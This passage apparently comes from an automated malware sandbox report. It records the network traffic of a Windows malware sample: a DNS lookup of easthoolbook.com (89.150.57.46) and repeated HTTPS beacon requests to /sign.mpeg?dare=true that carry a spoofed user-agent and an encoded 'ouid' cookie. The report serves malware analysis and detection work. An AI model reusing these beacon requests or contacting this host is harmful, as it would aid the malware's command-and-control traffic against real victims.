                                                                          Apr 19, 2024 15:32:40.921047926 CEST4434974189.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:40.921072960 CEST49741443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:40.921170950 CEST49741443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:40.921525955 CEST49741443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:40.921540976 CEST4434974189.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:42.866808891 CEST49742443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:42.866857052 CEST4434974289.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:42.866945982 CEST49742443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:42.867289066 CEST49742443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:42.867300987 CEST4434974289.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:43.492408037 CEST4434974289.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:43.492472887 CEST49742443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:43.492955923 CEST49742443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:43.492966890 CEST4434974289.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:43.494355917 CEST49742443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:43.494362116 CEST4434974289.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:43.907011986 CEST4434974289.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:43.907092094 CEST49742443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:43.907124996 CEST4434974289.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:43.907169104 CEST4434974289.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:43.907217979 CEST49742443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:43.907440901 CEST49742443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:43.907460928 CEST4434974289.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:45.880081892 CEST49743443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:45.880125999 CEST4434974389.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:45.880223036 CEST49743443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:45.880475044 CEST49743443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:45.880487919 CEST4434974389.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:46.507266045 CEST4434974389.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:46.507641077 CEST49743443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:46.524441004 CEST49743443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:46.524461031 CEST4434974389.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:46.526103020 CEST49743443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:46.526113033 CEST4434974389.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:46.917293072 CEST4434974389.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:46.917380095 CEST49743443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:46.917393923 CEST4434974389.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:46.917426109 CEST4434974389.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:46.917433023 CEST49743443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:46.917459965 CEST49743443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:46.917849064 CEST49743443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:46.917865992 CEST4434974389.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:48.850107908 CEST49744443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:48.850147009 CEST4434974489.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:48.850241899 CEST49744443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:48.850475073 CEST49744443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:48.850488901 CEST4434974489.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:49.476893902 CEST4434974489.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:49.476944923 CEST49744443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:49.477766991 CEST49744443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:49.477780104 CEST4434974489.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:49.485407114 CEST49744443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:49.485415936 CEST4434974489.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:49.892160892 CEST4434974489.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:49.892283916 CEST4434974489.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:49.892412901 CEST49744443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:49.892900944 CEST49744443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:49.892920971 CEST4434974489.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:51.834130049 CEST49745443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:51.834178925 CEST4434974589.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:51.834250927 CEST49745443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:51.834486961 CEST49745443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:51.834501982 CEST4434974589.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:52.460043907 CEST4434974589.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:52.460160971 CEST49745443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:52.460722923 CEST49745443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:52.460732937 CEST4434974589.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:52.462018013 CEST49745443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:52.462025881 CEST4434974589.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:52.876801014 CEST4434974589.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:52.876940012 CEST4434974589.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:52.877000093 CEST49745443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:52.877306938 CEST49745443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:52.877329111 CEST4434974589.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:56.128837109 CEST49746443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:56.128889084 CEST4434974689.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:56.128952026 CEST49746443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:56.130975008 CEST49746443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:56.130985975 CEST4434974689.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:56.742496967 CEST4434974689.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:56.742597103 CEST49746443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:56.743027925 CEST49746443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:56.743035078 CEST4434974689.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:56.744327068 CEST49746443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:56.744333029 CEST4434974689.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:57.150635004 CEST4434974689.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:57.150700092 CEST49746443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:57.150726080 CEST4434974689.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:57.150767088 CEST49746443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:57.150772095 CEST4434974689.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:57.150809050 CEST49746443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:57.150855064 CEST4434974689.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:57.150897980 CEST49746443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:57.150994062 CEST49746443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:57.151007891 CEST4434974689.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:59.104425907 CEST49747443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:59.104480028 CEST4434974789.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:59.104553938 CEST49747443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:59.104928017 CEST49747443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:59.104942083 CEST4434974789.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:59.729063034 CEST4434974789.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:59.729191065 CEST49747443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:59.729722023 CEST49747443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:59.729748964 CEST4434974789.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:32:59.731070995 CEST49747443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:32:59.731084108 CEST4434974789.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:33:00.145243883 CEST4434974789.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:33:00.145368099 CEST4434974789.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:33:00.145428896 CEST49747443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:33:00.145428896 CEST49747443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:33:00.159507036 CEST49747443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:33:00.159559011 CEST4434974789.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:33:02.131889105 CEST49748443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:33:02.131933928 CEST4434974889.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:33:02.132023096 CEST49748443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:33:02.132297993 CEST49748443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:33:02.132318974 CEST4434974889.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:33:02.755567074 CEST4434974889.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:33:02.755642891 CEST49748443192.168.2.689.150.57.46

                                                                          UDP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Apr 19, 2024 15:30:59.005417109 CEST5001453192.168.2.61.1.1.1
                                                                          Apr 19, 2024 15:30:59.143554926 CEST53500141.1.1.1192.168.2.6

                                                                          DNS Queries

                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Apr 19, 2024 15:30:59.005417109 CEST192.168.2.61.1.1.10x337bStandard query (0)easthoolbook.comA (IP address)IN (0x0001)false

                                                                          DNS Answers

                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Apr 19, 2024 15:30:59.143554926 CEST1.1.1.1192.168.2.60x337bNo error (0)easthoolbook.com89.150.57.46A (IP address)IN (0x0001)false

                                                                          HTTP Request Dependency Graph

                                                                          • easthoolbook.com

                                                                          HTTPS Proxied Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.64969989.150.57.464436516C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-04-19 13:30:59 UTC517OUTGET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:31:00 UTC141INHTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:28:18 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:31:00 UTC600INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 37 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 38 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 20 20 20 20 3c 68 65 61 64 3e 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 20 2f 3e 20 20 20 20 20 20 20 20 3c
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          1192.168.2.64970089.150.57.464436516C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-04-19 13:31:02 UTC517OUTGET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:31:03 UTC141INHTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:28:21 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:31:03 UTC600INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 37 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 38 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 20 20 20 20 3c 68 65 61 64 3e 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 20 2f 3e 20 20 20 20 20 20 20 20 3c
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          2192.168.2.64970189.150.57.464436516C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-04-19 13:31:05 UTC517OUTGET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:31:06 UTC141INHTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:28:24 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:31:06 UTC600INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 37 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 38 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 20 20 20 20 3c 68 65 61 64 3e 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 20 2f 3e 20 20 20 20 20 20 20 20 3c
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          3192.168.2.64970289.150.57.464436516C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-04-19 13:31:08 UTC517OUTGET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:31:09 UTC141INHTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:28:27 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:31:09 UTC600INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 37 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 38 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 20 20 20 20 3c 68 65 61 64 3e 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 20 2f 3e 20 20 20 20 20 20 20 20 3c
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          4192.168.2.64970389.150.57.464436516C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-04-19 13:31:11 UTC517OUTGET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:31:12 UTC141INHTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:28:30 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:31:12 UTC600INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 37 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 38 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 20 20 20 20 3c 68 65 61 64 3e 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 20 2f 3e 20 20 20 20 20 20 20 20 3c
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          5192.168.2.64970489.150.57.464436516C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-04-19 13:31:15 UTC517OUTGET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:31:15 UTC141INHTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:28:34 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:31:15 UTC600INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 37 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 38 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 20 20 20 20 3c 68 65 61 64 3e 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 20 2f 3e 20 20 20 20 20 20 20 20 3c
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          6192.168.2.64971389.150.57.464436516C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-04-19 13:31:18 UTC517OUTGET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
